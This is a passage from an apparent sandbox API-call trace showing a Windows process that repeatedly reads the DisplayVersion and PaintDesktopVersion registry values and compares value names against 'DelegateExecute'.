lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", lpValue="DisplayVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4 | out: pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4) returned 0x2 [0272.450] StrCmpIW (psz1="PaintDesktopVersion", psz2="DelegateExecute") returned 1 [0272.450] RegGetValueW (in: hkey=0xffffffff80000001, lpSubKey="Control Panel\\Desktop", lpValue="PaintDesktopVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4 | out: pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4) returned 0x0 [0272.493] StrCmpIW (psz1="DisplayVersion", psz2="DelegateExecute") returned 1 [0272.493] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", lpValue="DisplayVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4 | out: pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4) returned 0x2 [0272.493] StrCmpIW (psz1="PaintDesktopVersion", psz2="DelegateExecute") returned 1 [0272.493] RegGetValueW (in: hkey=0xffffffff80000001, lpSubKey="Control Panel\\Desktop", lpValue="PaintDesktopVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4 | out: pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4) returned 0x0 [0272.523] StrCmpIW (psz1="DisplayVersion", psz2="DelegateExecute") returned 1 [0272.523] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", lpValue="DisplayVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4 | out: pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4) returned 0x2 [0272.523] StrCmpIW (psz1="PaintDesktopVersion", psz2="DelegateExecute") returned 1 [0272.523] RegGetValueW (in: hkey=0xffffffff80000001, lpSubKey="Control Panel\\Desktop", lpValue="PaintDesktopVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4 | out: pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4) returned 0x0 [0272.566] StrCmpIW (psz1="DisplayVersion", psz2="DelegateExecute") returned 1 [0272.566] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", lpValue="DisplayVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4 | out: pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4) returned 0x2 [0272.566] StrCmpIW (psz1="PaintDesktopVersion", psz2="DelegateExecute") returned 1 [0272.566] RegGetValueW (in: hkey=0xffffffff80000001, lpSubKey="Control Panel\\Desktop", lpValue="PaintDesktopVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4 | out: pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4) returned 0x0 [0272.594] StrCmpIW (psz1="DisplayVersion", psz2="DelegateExecute") returned 1 [0272.594] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", lpValue="DisplayVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4 | out: pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4) returned 0x2 [0272.594] StrCmpIW (psz1="PaintDesktopVersion", psz2="DelegateExecute") returned 1 [0272.594] RegGetValueW (in: hkey=0xffffffff80000001, lpSubKey="Control Panel\\Desktop", lpValue="PaintDesktopVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4 | out: pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4) returned 0x0 [0272.622] StrCmpIW (psz1="DisplayVersion", psz2="DelegateExecute") returned 1 [0272.622] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", lpValue="DisplayVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4 | out: pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4) returned 0x2 [0272.622] StrCmpIW (psz1="PaintDesktopVersion", psz2="DelegateExecute") returned 1 [0272.623] RegGetValueW (in: hkey=0xffffffff80000001, lpSubKey="Control Panel\\Desktop", lpValue="PaintDesktopVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4 | out: pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4) returned 0x0 [0272.656] StrCmpIW (psz1="DisplayVersion", psz2="DelegateExecute") returned 1 [0272.656] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", lpValue="DisplayVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4 | out: pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4) returned 0x2 [0272.656] StrCmpIW (psz1="PaintDesktopVersion", psz2="DelegateExecute") returned 1 [0272.656] RegGetValueW (in: hkey=0xffffffff80000001, lpSubKey="Control Panel\\Desktop", lpValue="PaintDesktopVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4 | out: pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4) returned 0x0 [0272.683] StrCmpIW (psz1="DisplayVersion", psz2="DelegateExecute") returned 1 [0272.683] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", lpValue="DisplayVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4 | out: pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4) returned 0x2 [0272.683] StrCmpIW (psz1="PaintDesktopVersion", psz2="DelegateExecute") returned 1 [0272.683] RegGetValueW (in: hkey=0xffffffff80000001, lpSubKey="Control Panel\\Desktop", lpValue="PaintDesktopVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4 | out: pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4) returned 0x0 [0272.711] StrCmpIW (psz1="DisplayVersion", psz2="DelegateExecute") returned 1 [0272.711] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", lpValue="DisplayVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4 | out: pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4) returned 0x2 [0272.711] StrCmpIW (psz1="PaintDesktopVersion", psz2="DelegateExecute") returned 1 [0272.712] RegGetValueW (in: hkey=0xffffffff80000001, lpSubKey="Control Panel\\Desktop", lpValue="PaintDesktopVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4 | out: pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4) returned 0x0 [0272.732] StrCmpIW (psz1="DisplayVersion", psz2="DelegateExecute") returned 1 [0272.733] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", lpValue="DisplayVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4 | out: pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4) returned 0x2 [0272.733] StrCmpIW (psz1="PaintDesktopVersion", psz2="DelegateExecute") returned 1 [0272.733] RegGetValueW (in: hkey=0xffffffff80000001, lpSubKey="Control Panel\\Desktop", lpValue="PaintDesktopVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4 | out: pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4) returned 0x0 [0272.784] StrCmpIW (psz1="DisplayVersion", psz2="DelegateExecute") returned 1 [0272.784] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", lpValue="DisplayVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4 | out: pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4) returned 0x2 [0272.784] StrCmpIW (psz1="PaintDesktopVersion", psz2="DelegateExecute") returned 1 [0272.784] RegGetValueW (in: hkey=0xffffffff80000001, lpSubKey="Control Panel\\Desktop", lpValue="PaintDesktopVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4 | out: pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4) returned 0x0 [0272.902] StrCmpIW (psz1="DisplayVersion", psz2="DelegateExecute") returned 1 [0272.902] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", lpValue="DisplayVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4 | out: pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4) returned 0x2 [0272.903] StrCmpIW (psz1="PaintDesktopVersion", psz2="DelegateExecute") returned 1 [0272.903] RegGetValueW (in: hkey=0xffffffff80000001, lpSubKey="Control Panel\\Desktop", lpValue="PaintDesktopVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4 | out: pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4) returned 0x0 [0272.953] StrCmpIW (psz1="DisplayVersion", psz2="DelegateExecute") returned 1 [0272.953] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", lpValue="DisplayVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4 | out: pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4) returned 0x2 [0272.953] StrCmpIW (psz1="PaintDesktopVersion", psz2="DelegateExecute") returned 1 [0272.953] RegGetValueW (in: hkey=0xffffffff80000001, lpSubKey="Control Panel\\Desktop", lpValue="PaintDesktopVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4 | out: pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4) returned 0x0 [0272.977] StrCmpIW (psz1="DisplayVersion", psz2="DelegateExecute") returned 1 [0272.977] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", lpValue="DisplayVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4 | out: pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4) returned 0x2 [0272.977] StrCmpIW (psz1="PaintDesktopVersion", psz2="DelegateExecute") returned 1 [0272.977] RegGetValueW (in: hkey=0xffffffff80000001, lpSubKey="Control Panel\\Desktop", lpValue="PaintDesktopVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4 | out: pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4) returned 0x0 [0272.996] StrCmpIW (psz1="DisplayVersion", psz2="DelegateExecute") returned 1 [0272.996] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", lpValue="DisplayVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4 | out: pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4) returned 0x2 [0272.996] StrCmpIW (psz1="PaintDesktopVersion", psz2="DelegateExecute") returned 1 [0272.996] RegGetValueW (in: hkey=0xffffffff80000001, lpSubKey="Control Panel\\Desktop", lpValue="PaintDesktopVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4 | out: pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4) returned 0x0 [0273.053] StrCmpIW (psz1="DisplayVersion", psz2="DelegateExecute") returned 1 [0273.053] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", lpValue="DisplayVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4 | out: pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4) returned 0x2 [0273.054] StrCmpIW (psz1="PaintDesktopVersion", psz2="DelegateExecute") returned 1 [0273.054] RegGetValueW (in: hkey=0xffffffff80000001, lpSubKey="Control Panel\\Desktop", lpValue="PaintDesktopVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4 | out: pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4) returned 0x0 [0273.089] StrCmpIW (psz1="DisplayVersion", psz2="DelegateExecute") returned 1 [0273.089] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", lpValue="DisplayVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4 | out: pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4) returned 0x2 [0273.089] StrCmpIW (psz1="PaintDesktopVersion", psz2="DelegateExecute") returned 1 [0273.089] RegGetValueW (in: hkey=0xffffffff80000001, lpSubKey="Control Panel\\Desktop", lpValue="PaintDesktopVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4 | out: pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4) returned 0x0 [0273.142] StrCmpIW (psz1="DisplayVersion", psz2="DelegateExecute") returned 1 [0273.142] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", lpValue="DisplayVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4 | out: pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4) returned 0x2 [0273.142] StrCmpIW (psz1="PaintDesktopVersion", psz2="DelegateExecute") returned 1 [0273.142] RegGetValueW (in: hkey=0xffffffff80000001, lpSubKey="Control Panel\\Desktop", lpValue="PaintDesktopVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4 | out: pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4) returned 0x0 [0273.185] StrCmpIW (psz1="DisplayVersion", psz2="DelegateExecute") returned 1 [0273.185] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", lpValue="DisplayVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4 | out: pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4) returned 0x2 [0273.185] StrCmpIW (psz1="PaintDesktopVersion", psz2="DelegateExecute") returned 1 [0273.185] RegGetValueW (in: hkey=0xffffffff80000001, lpSubKey="Control Panel\\Desktop", lpValue="PaintDesktopVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4 | out: pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4) returned 0x0 [0273.219] StrCmpIW (psz1="DisplayVersion", psz2="DelegateExecute") returned 1 [0273.219] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", lpValue="DisplayVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4 | out: pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4) returned 0x2 [0273.219] StrCmpIW (psz1="PaintDesktopVersion", psz2="DelegateExecute") returned 1 [0273.219] RegGetValueW (in: hkey=0xffffffff80000001, lpSubKey="Control Panel\\Desktop", lpValue="PaintDesktopVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4 | out: pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4) returned 0x0 [0273.304] StrCmpIW (psz1="DisplayVersion", psz2="DelegateExecute") returned 1 [0273.304] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", lpValue="DisplayVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4 | out: pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4) returned 0x2 [0273.305] StrCmpIW (psz1="PaintDesktopVersion", psz2="DelegateExecute") returned 1 [0273.305] RegGetValueW (in: hkey=0xffffffff80000001, lpSubKey="Control Panel\\Desktop", lpValue="PaintDesktopVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4 | out: pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4) returned 0x0 [0273.356] StrCmpIW (psz1="DisplayVersion", psz2="DelegateExecute") returned 1 [0273.356] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", lpValue="DisplayVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4 | out: pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4) returned 0x2 [0273.356] StrCmpIW (psz1="PaintDesktopVersion", psz2="DelegateExecute") returned 1 [0273.356] RegGetValueW (in: hkey=0xffffffff80000001, lpSubKey="Control Panel\\Desktop", lpValue="PaintDesktopVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4 | out: pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4) returned 0x0 [0273.390] StrCmpIW (psz1="DisplayVersion", psz2="DelegateExecute") returned 1 [0273.390] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", lpValue="DisplayVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4 | out: pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4) returned 0x2 [0273.390] StrCmpIW (psz1="PaintDesktopVersion", psz2="DelegateExecute") returned 1 [0273.390] RegGetValueW (in: hkey=0xffffffff80000001, lpSubKey="Control Panel\\Desktop", lpValue="PaintDesktopVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4 | out: pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4) returned 0x0 [0273.412] StrCmpIW (psz1="DisplayVersion", psz2="DelegateExecute") returned 1 [0273.412] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", lpValue="DisplayVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4 | out: pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4) returned 0x2 [0273.412] StrCmpIW (psz1="PaintDesktopVersion", psz2="DelegateExecute") returned 1 [0273.412] RegGetValueW (in: hkey=0xffffffff80000001, lpSubKey="Control Panel\\Desktop", lpValue="PaintDesktopVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4 | out: pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4) returned 0x0 [0273.447] StrCmpIW (psz1="DisplayVersion", psz2="DelegateExecute") returned 1 [0273.447] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", lpValue="DisplayVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4 | out: pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4) returned 0x2 [0273.447] StrCmpIW (psz1="PaintDesktopVersion", psz2="DelegateExecute") returned 1 [0273.447] RegGetValueW (in: hkey=0xffffffff80000001, lpSubKey="Control Panel\\Desktop", lpValue="PaintDesktopVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4 | out: pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4) returned 0x0 [0273.491] StrCmpIW (psz1="DisplayVersion", psz2="DelegateExecute") returned 1 [0273.491] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", lpValue="DisplayVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4 | out: pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4) returned 0x2 [0273.492] StrCmpIW (psz1="PaintDesktopVersion", psz2="DelegateExecute") returned 1 [0273.492] RegGetValueW (in: hkey=0xffffffff80000001, lpSubKey="Control Panel\\Desktop", lpValue="PaintDesktopVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4 | out: pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4) returned 0x0 [0273.513] StrCmpIW (psz1="DisplayVersion", psz2="DelegateExecute") returned 1 [0273.513] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", lpValue="DisplayVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4 | out: pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4) returned 0x2 [0273.514] StrCmpIW (psz1="PaintDesktopVersion", psz2="DelegateExecute") returned 1 [0273.514] RegGetValueW (in: hkey=0xffffffff80000001, lpSubKey="Control Panel\\Desktop", lpValue="PaintDesktopVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4 | out: pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4) returned 0x0 [0273.541] StrCmpIW (psz1="DisplayVersion", psz2="DelegateExecute") returned 1 [0273.541] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", lpValue="DisplayVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4 | out: pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4) returned 0x2 [0273.541] StrCmpIW (psz1="PaintDesktopVersion", psz2="DelegateExecute") returned 1 [0273.541] RegGetValueW (in: hkey=0xffffffff80000001, lpSubKey="Control Panel\\Desktop", lpValue="PaintDesktopVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4 | out: pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4) returned 0x0 [0273.563] StrCmpIW (psz1="DisplayVersion", psz2="DelegateExecute") returned 1 [0273.563] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", lpValue="DisplayVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4 | out: pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4) returned 0x2 [0273.563] StrCmpIW (psz1="PaintDesktopVersion", psz2="DelegateExecute") returned 1 [0273.563] RegGetValueW (in: hkey=0xffffffff80000001, lpSubKey="Control Panel\\Desktop", lpValue="PaintDesktopVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4 | out: pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4) returned 0x0 [0273.594] StrCmpIW (psz1="DisplayVersion", psz2="DelegateExecute") returned 1 [0273.594] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", lpValue="DisplayVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4 | out: pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4) returned 0x2 [0273.594] StrCmpIW (psz1="PaintDesktopVersion", psz2="DelegateExecute") returned 1 [0273.594] RegGetValueW (in: hkey=0xffffffff80000001, lpSubKey="Control Panel\\Desktop", lpValue="PaintDesktopVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4 | out: pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4) returned 0x0 [0273.611] StrCmpIW (psz1="DisplayVersion", psz2="DelegateExecute") returned 1 [0273.611] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", lpValue="DisplayVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4 | out: pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4) returned 0x2 [0273.611] StrCmpIW (psz1="PaintDesktopVersion", psz2="DelegateExecute") returned 1 [0273.611] RegGetValueW (in: hkey=0xffffffff80000001, lpSubKey="Control Panel\\Desktop", lpValue="PaintDesktopVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4 | out: pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4) returned 0x0 [0273.655] StrCmpIW (psz1="DisplayVersion", psz2="DelegateExecute") returned 1 [0273.655] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", lpValue="DisplayVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4 | out: pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4) returned 0x2 [0273.655] StrCmpIW (psz1="PaintDesktopVersion", psz2="DelegateExecute") returned 1 [0273.655] RegGetValueW (in: hkey=0xffffffff80000001, lpSubKey="Control Panel\\Desktop", lpValue="PaintDesktopVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4 | out: pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4) returned 0x0 [0273.684] StrCmpIW (psz1="DisplayVersion", psz2="DelegateExecute") returned 1 [0273.684] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", lpValue="DisplayVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4 | out: pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4) returned 0x2 [0273.684] StrCmpIW (psz1="PaintDesktopVersion", psz2="DelegateExecute") returned 1 [0273.684] RegGetValueW (in: hkey=0xffffffff80000001, lpSubKey="Control Panel\\Desktop", lpValue="PaintDesktopVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4 | out: pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4) returned 0x0 [0273.722] StrCmpIW (psz1="DisplayVersion", psz2="DelegateExecute") returned 1 [0273.722] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", lpValue="DisplayVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4 | out: pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4) returned 0x2 [0273.722] StrCmpIW (psz1="PaintDesktopVersion", psz2="DelegateExecute") returned 1 [0273.722] RegGetValueW (in: hkey=0xffffffff80000001, lpSubKey="Control Panel\\Desktop", lpValue="PaintDesktopVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4 | out: pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4) returned 0x0 [0273.758] StrCmpIW (psz1="DisplayVersion", psz2="DelegateExecute") returned 1 [0273.758] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", lpValue="DisplayVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4 | out: pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4) returned 0x2 [0273.758] StrCmpIW (psz1="PaintDesktopVersion", psz2="DelegateExecute") returned 1 [0273.758] RegGetValueW (in: hkey=0xffffffff80000001, lpSubKey="Control Panel\\Desktop", lpValue="PaintDesktopVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4 | out: pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4) returned 0x0 [0273.826] StrCmpIW (psz1="DisplayVersion", psz2="DelegateExecute") returned 1 [0273.826] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", lpValue="DisplayVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4 | out: pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4) returned 0x2 [0273.826] StrCmpIW (psz1="PaintDesktopVersion", psz2="DelegateExecute") returned 1 [0273.826] 